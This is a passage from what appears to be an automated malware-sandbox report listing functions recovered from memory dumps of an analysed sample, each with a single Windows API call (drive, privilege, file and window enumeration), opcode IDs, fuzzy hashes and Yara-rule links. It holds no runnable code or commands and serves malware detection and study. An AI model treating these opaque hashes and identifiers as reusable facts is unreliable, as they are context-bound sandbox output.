                                                                                            • Instruction Fuzzy Hash: 2C11AF75604300EFEB21CF15DC85FA6BBA8EF05220F14846AE949CB681D674E9048A71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F4137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: a7823a1cff852f89f8a43869c4ad2e7a3c83bccbe9cf7ddd2e7f47d9144b0028
                                                                                            • Instruction ID: b9bf78eef98c06d7e02479506a21fa23d46095b3159456bf656e6a0f338fd15c
                                                                                            • Opcode Fuzzy Hash: a7823a1cff852f89f8a43869c4ad2e7a3c83bccbe9cf7ddd2e7f47d9144b0028
                                                                                            • Instruction Fuzzy Hash: 292192725083809FEB22CF65DC45A96FFB4EF06220F08849AED858B563D235A448DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F40F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 01F40FB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: a77454aa5f6814eabaa29b9ff7e210926226fd15d3574638f22107344070ffe6
                                                                                            • Instruction ID: 7ac49ee99c3188a4a99df535c14f4ec34989894068caae8342f1bde3c4c23d42
                                                                                            • Opcode Fuzzy Hash: a77454aa5f6814eabaa29b9ff7e210926226fd15d3574638f22107344070ffe6
                                                                                            • Instruction Fuzzy Hash: BE214C7150D7C09FDB138B25DC55B92BFA4EF12224F0D84EAE9888F693D2699409C762
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleMode
                                                                                            • String ID:
                                                                                            • API String ID: 4145635619-0
                                                                                            • Opcode ID: 376b67b5a47dac847f19d3f88af7f5e8ec013a4b58b846d3c8ff821a359e630f
                                                                                            • Instruction ID: 9b5a4a606d07bd8f14b08c8b6ddce25ef326574c3db95f1b332e9f952b39c555
                                                                                            • Opcode Fuzzy Hash: 376b67b5a47dac847f19d3f88af7f5e8ec013a4b58b846d3c8ff821a359e630f
                                                                                            • Instruction Fuzzy Hash: A821A4755093C09FDB128B25DC55B92BFA4EF07310F0D84DBDD858F263D2289908DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D0AB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 4b43a7a86b33ac1475fa78be26df6ae55a4b7fc972d90044d914e2afb4ba04ad
                                                                                            • Instruction ID: 762551438493bfb866050d3f289b239a14fcf8edc4b7122218591abb7d9b4c5b
                                                                                            • Opcode Fuzzy Hash: 4b43a7a86b33ac1475fa78be26df6ae55a4b7fc972d90044d914e2afb4ba04ad
                                                                                            • Instruction Fuzzy Hash: 652172716053809FEB22CF29DC44B52BFA8EF56210F0884AAED49CB293D265E404CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F410D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 01F41148
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: f09b3ea6c45bf494d9af8ff28e19a4a92633950dc726e5c6323b410b00344207
                                                                                            • Instruction ID: 623ceb3938298ee501b356ccea16903a502f4324d881a2da9bc70799943e9b76
                                                                                            • Opcode Fuzzy Hash: f09b3ea6c45bf494d9af8ff28e19a4a92633950dc726e5c6323b410b00344207
                                                                                            • Instruction Fuzzy Hash: BC216D6150E3C09FD7138B259C54A62BFB4EF57620F0D80DBD8858F2A3D2696808D772
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,F38DA66F,00000000,00000000,00000000,00000000), ref: 01D0AFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: ecab89ed94ff0c4fee1046f9e7b3c61d36c27a056566979e68512e82e03e93da
                                                                                            • Instruction ID: eab4f0c72939439d6983b31a39c9885abbe1425953c10e4fe138fd3da7861fa0
                                                                                            • Opcode Fuzzy Hash: ecab89ed94ff0c4fee1046f9e7b3c61d36c27a056566979e68512e82e03e93da
                                                                                            • Instruction Fuzzy Hash: 7111C172504300EFEB22DF55DC85FAAFBA8EF44720F14846AFD498B281D674E9048BB5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01D0BA7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: c1eda1e2ec9d4383714da41bbcfa662dfabbc195aeabc54fcb692677daf01d4f
                                                                                            • Instruction ID: 5b95d957ea0eb664d85758bda8cf60a66c6460493db2434e0920a71d51cc36af
                                                                                            • Opcode Fuzzy Hash: c1eda1e2ec9d4383714da41bbcfa662dfabbc195aeabc54fcb692677daf01d4f
                                                                                            • Instruction Fuzzy Hash: 4E118C76508380AFDB22CF65DC44B52FFF4EF09210F08849AE9898B662D275A458CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F40886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,F38DA66F,00000000,00000000,00000000,00000000), ref: 01F408E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 0dcfaa89b7db3c2899930ed937a04395b5bddb741fa178f63ef7020f245425d5
                                                                                            • Instruction ID: 6090a8c95f67594c0a68c737129d6f3ddd7d8a6584705856a2751149d3a81e2b
                                                                                            • Opcode Fuzzy Hash: 0dcfaa89b7db3c2899930ed937a04395b5bddb741fa178f63ef7020f245425d5
                                                                                            • Instruction Fuzzy Hash: 9B11C176400300EFFB21CF55DC45FA6FBA8EF44720F14895AFE499A242D675A5048BB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: Flags
                                                                                            • String ID:
                                                                                            • API String ID: 3401871038-0
                                                                                            • Opcode ID: 27262e56a821e5310334511a8974fec10189a285632011be5948b98351712efe
                                                                                            • Instruction ID: cdcef308cc9046066cfbb967876dd2c03a220a77a1d4080728aa52de9ca7f922
                                                                                            • Opcode Fuzzy Hash: 27262e56a821e5310334511a8974fec10189a285632011be5948b98351712efe
                                                                                            • Instruction Fuzzy Hash: A9114C715093C49FEB128B25DC54BA2BFB4DF47624F1880DBEDC58F263D265A808DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F412D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 01F4132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: e820bea93619653cc0d19b3b486915d0ba5b442424cfe24ca6bf121abd03cb3f
                                                                                            • Instruction ID: 3d4603d000c5f46a8a9fbce722386f2c6cacf02580a0b98295a1bcd0fea6bef2
                                                                                            • Opcode Fuzzy Hash: e820bea93619653cc0d19b3b486915d0ba5b442424cfe24ca6bf121abd03cb3f
                                                                                            • Instruction Fuzzy Hash: 0911C1715093809FEB228F25DC45B96FFA4EF06220F0884EEED458B253D239A808CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F405E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNELBASE(?), ref: 01F40640
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2564024751-0
                                                                                            • Opcode ID: 42a707326ff8ded26b5121118b02a2d0e38f0a30ae16508c963f5089fd8ac672
                                                                                            • Instruction ID: f0bcc9e3f1db5e330b6b41b464000ada1aa460ca3f57183178238b6273312237
                                                                                            • Opcode Fuzzy Hash: 42a707326ff8ded26b5121118b02a2d0e38f0a30ae16508c963f5089fd8ac672
                                                                                            • Instruction Fuzzy Hash: 2911E5B55093C09FDB128B25DC95B52FFB4DF43220F1880EBED858B663D275A908CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D0AB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 9f547ba28442764636427b4e4447960568fc8939ac8e09300f9c00bc1d901adf
                                                                                            • Instruction ID: 3ff33a8de72d86a71d5ced8d6e506faa81af5bda6607e3e0e4aa8267e10d7ea3
                                                                                            • Opcode Fuzzy Hash: 9f547ba28442764636427b4e4447960568fc8939ac8e09300f9c00bc1d901adf
                                                                                            • Instruction Fuzzy Hash: 171161B26007009FEB21DF69DC85B56FBD8EF14621F08C4AADD49CB682E674E444CA71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 01D0AA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: 2e86a3a2bd1e0f000c7154750deb11c71cdbec409eaef314f984d46aed9091c4
                                                                                            • Instruction ID: fb4a93723eb447d90bb9500213b8ab0e8cde5af95d131972929c4f8f3cd0a880
                                                                                            • Opcode Fuzzy Hash: 2e86a3a2bd1e0f000c7154750deb11c71cdbec409eaef314f984d46aed9091c4
                                                                                            • Instruction Fuzzy Hash: 3911917540D7C09FD7128B25DC85B92BFA4EF07224F0980DBDD858F2A3D269A909D762
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F4092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 01F4099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: 7c590f4a814321a38ca913b880a99cfa7562f79190e5c363e4e852fbfc226b69
                                                                                            • Instruction ID: d7a08d143da8d0aed125ec5436285436be9505d9247717602c89bdff482e3f41
                                                                                            • Opcode Fuzzy Hash: 7c590f4a814321a38ca913b880a99cfa7562f79190e5c363e4e852fbfc226b69
                                                                                            • Instruction Fuzzy Hash: 4E119D758093C49FE7128B25DC55B92BFB4EF07324F0980DAE9854B263D265A908CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F407C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,F38DA66F,00000000,00000000,00000000,00000000), ref: 01F40819
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: 7aad8c5c7e3483d6457b98f3e3947edbbf21312f4e64841c26c37e6ce5bd037c
                                                                                            • Instruction ID: f839819da2413eac3f07bb375cadbaed182b305039603d6d753e651cdc9ad232
                                                                                            • Opcode Fuzzy Hash: 7aad8c5c7e3483d6457b98f3e3947edbbf21312f4e64841c26c37e6ce5bd037c
                                                                                            • Instruction Fuzzy Hash: 9301C072500304EFFB20DF15DD85FA6FB98DF04720F14809AFE099A242DA79A9448AA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F413AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: acd41994acdc4a59bbbd1cc672bba54349e112ca50a1e15d558c1bcd28508b7a
                                                                                            • Instruction ID: e94e095acf4db7f586cf2f41dfc9b31261dcb8c60cf39365dcef3dfeb8ae4a42
                                                                                            • Opcode Fuzzy Hash: acd41994acdc4a59bbbd1cc672bba54349e112ca50a1e15d558c1bcd28508b7a
                                                                                            • Instruction Fuzzy Hash: B211A176904700DFEB21CF55DC85B66FFA4EF05620F0884AADD498B652D276E444CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 01D0ABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: bd69d59126e4c4f1156c327c280faf817ae88673df11260728f61ea801379c6d
                                                                                            • Instruction ID: 3a205533e14696e50453892a01e9ff97688355e0ec89f739b74b2b03ad496516
                                                                                            • Opcode Fuzzy Hash: bd69d59126e4c4f1156c327c280faf817ae88673df11260728f61ea801379c6d
                                                                                            • Instruction Fuzzy Hash: 4911C2B54093809FDB11CF65DC85B82BFA4EF02320F0980EBDD488F253D274A508CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01D0BA7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 2cb0b27e9b379f9a7caeeebd28edc6a6a02629b2ee68b7b461f6601c27650b46
                                                                                            • Instruction ID: 36e46afbd1d3738d69d9b53f235678889e7b5581d575d452273ab66eee5e6460
                                                                                            • Opcode Fuzzy Hash: 2cb0b27e9b379f9a7caeeebd28edc6a6a02629b2ee68b7b461f6601c27650b46
                                                                                            • Instruction Fuzzy Hash: C7118E76504700DFEB22CF55DC44B52FBE4EF08211F0884AADD898A652D3B5E454DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EnumWindows.USER32(?,00000E9C,?,?), ref: 01D0A23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumWindows
                                                                                            • String ID:
                                                                                            • API String ID: 1129996299-0
                                                                                            • Opcode ID: a04e51f6a4113b33763855723125019203694affdd9e9d43788af15c226dda17
                                                                                            • Instruction ID: fdaae4b9091f27086b738697ad89108c2d9700a19a5c2d405e854e78cea7093e
                                                                                            • Opcode Fuzzy Hash: a04e51f6a4113b33763855723125019203694affdd9e9d43788af15c226dda17
                                                                                            • Instruction Fuzzy Hash: 9A018471900600AFE710DF26DD46B66FBA8FB84B20F24816AED089B741E235F515CBE5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F4104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 01F4109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: 0bf07dfea3daebdc6ca1595354cda85ca95b419bbd5248a5f5fb10ad103037ec
                                                                                            • Instruction ID: e5aa3d1294684f5fc4e30a637bf22e4137a2993bd671af5328dc1e22c9f3d048
                                                                                            • Opcode Fuzzy Hash: 0bf07dfea3daebdc6ca1595354cda85ca95b419bbd5248a5f5fb10ad103037ec
                                                                                            • Instruction Fuzzy Hash: 52018471900600AFE310DF26DD46B66FBA8FB84B20F24816AED099B741E335F515CBE5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F40196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 01F401D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: a7a1d4a8b4649c700fc7d09f52b842d4bfd0ef800772aaf27291058ef6da0a00
                                                                                            • Instruction ID: 0a185350a35093e449a6c4071cfa82d7c06c90f0184cab4107ac62a0623d8d9c
                                                                                            • Opcode Fuzzy Hash: a7a1d4a8b4649c700fc7d09f52b842d4bfd0ef800772aaf27291058ef6da0a00
                                                                                            • Instruction Fuzzy Hash: 2501B571904344DFEB10DF69DC85796FF98DF40620F18C4AAEE09CB642D675D504CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleMode
                                                                                            • String ID:
                                                                                            • API String ID: 4145635619-0
                                                                                            • Opcode ID: a10d311afac922daffb90e0241e8fc7ef72c562be48c4d2a19e65a90c4febe4d
                                                                                            • Instruction ID: 32a320b2b6286c3f22cab8a1bab13048b608d5022a6cf0bfe51b4d19c86a9ccf
                                                                                            • Opcode Fuzzy Hash: a10d311afac922daffb90e0241e8fc7ef72c562be48c4d2a19e65a90c4febe4d
                                                                                            • Instruction Fuzzy Hash: 5501F275504700DFEB21CF19DC85BA5FBA4EF04620F08C4AFDD498B696D279E804CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F412FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 01F4132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: ae8a1bc24c677c1e3fff5f570537501dae84ea73bf1f78aa00485cbc65fdec4f
                                                                                            • Instruction ID: 7bb44bc12a96bd02861e35f34017399ac79d10be40dca18f8972c497238b2858
                                                                                            • Opcode Fuzzy Hash: ae8a1bc24c677c1e3fff5f570537501dae84ea73bf1f78aa00485cbc65fdec4f
                                                                                            • Instruction Fuzzy Hash: 1801DF72908300DFEB20CF19DC85BA5FFA4EF04620F08C4AADC098BB42D27AE444CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01D0A94A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: ae89be274b520e6196067818ef1fa0327e2bc8c0cda1ee699b4d016f3b946f71
                                                                                            • Instruction ID: cb819d63510920a4b049aab6b49606e4cbb58e716c83167afe1d5929256da763
                                                                                            • Opcode Fuzzy Hash: ae89be274b520e6196067818ef1fa0327e2bc8c0cda1ee699b4d016f3b946f71
                                                                                            • Instruction Fuzzy Hash: E9016271900600ABD310DF16DD46B26FBA8FB88B20F24815AED085B741E275F515CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F40F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 01F40FB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: 033786041315d9abe8db2cc99431f44d29a506b1adead24335546681f4e4d0a4
                                                                                            • Instruction ID: 955b7317d320ca8b98d0403612e9bcc7659a2fd18c6b00739deb3b656e1bf28d
                                                                                            • Opcode Fuzzy Hash: 033786041315d9abe8db2cc99431f44d29a506b1adead24335546681f4e4d0a4
                                                                                            • Instruction Fuzzy Hash: E7018F71904340DFEB10DF19D885BA6FF94EF40620F18C4BAEE098F646E679E404CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F404B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 01F40502
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: a4a702f7c1bf395db949963c20670e85d725b6f89c9e4105a229d07ea9c2b029
                                                                                            • Instruction ID: 7b4f698af1004776b32cb1a3858066b237d0398bc15923fa0721f876c802286c
                                                                                            • Opcode Fuzzy Hash: a4a702f7c1bf395db949963c20670e85d725b6f89c9e4105a229d07ea9c2b029
                                                                                            • Instruction Fuzzy Hash: FE016271900600ABD310DF16DD46F26FBA8FB88B20F24815AED085B741E275F515CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F4060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNELBASE(?), ref: 01F40640
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2564024751-0
                                                                                            • Opcode ID: 15e3850fe73933e10fae3b1c148954d98d5681f3b1d0217a8246aa9e90a129fc
                                                                                            • Instruction ID: 95ec8b9d10e4803bdb5f4496bc1bf4f861e54aa1978fbb114e27b789405f0e75
                                                                                            • Opcode Fuzzy Hash: 15e3850fe73933e10fae3b1c148954d98d5681f3b1d0217a8246aa9e90a129fc
                                                                                            • Instruction Fuzzy Hash: 9C01F475500700CFEB108F19D8857A1FFA4DF41720F18C0AAED0A8B752D679E444DEA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 01D0ABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: 6a83370a81a8661216678070848a6f37852830838f91da78a8288d1402137941
                                                                                            • Instruction ID: 45b6828e7c5fead43ec85e1e6f39b5e98fab85ab8c3ac603afb3ea177c2cf8ca
                                                                                            • Opcode Fuzzy Hash: 6a83370a81a8661216678070848a6f37852830838f91da78a8288d1402137941
                                                                                            • Instruction Fuzzy Hash: 2E01FF31404740CFEB11DF5AEC89BA1FBA4EF04620F18C4ABCD098F282D278E404CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F41116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 01F41148
                                                                                            Memory Dump Source
